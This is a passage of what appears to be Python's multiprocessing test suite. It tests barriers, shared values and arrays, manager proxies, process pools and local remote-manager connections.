Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_nested_queue(self):
a = self.list() # Test queue inside list
a.append(self.Queue())
a[0].put(123)
self.assertEqual(a[0].get(), 123)
b = self.dict() # Test queue inside dict
b[0] = self.Queue()
b[0].put(456)
self.assertEqual(b[0].get(), 456)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
gc.collect() # For PyPy or other GCs.
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# regression tests for bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
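# (For reference: each register() call above makes the callable available on
# MyManager instances; exposed=('f', '_h') restricts which methods the 'Bar'
# proxy may call, and proxytype=IteratorProxy gives 'baz' proxies the
# __iter__/__next__ interface exercised by _TestMyManager.common() below.)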
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
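# (Hence the class attribute 'result' above is a list copy of 'values':
# the tuple sent here arrives as a list on the receiving side.)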
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle, this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
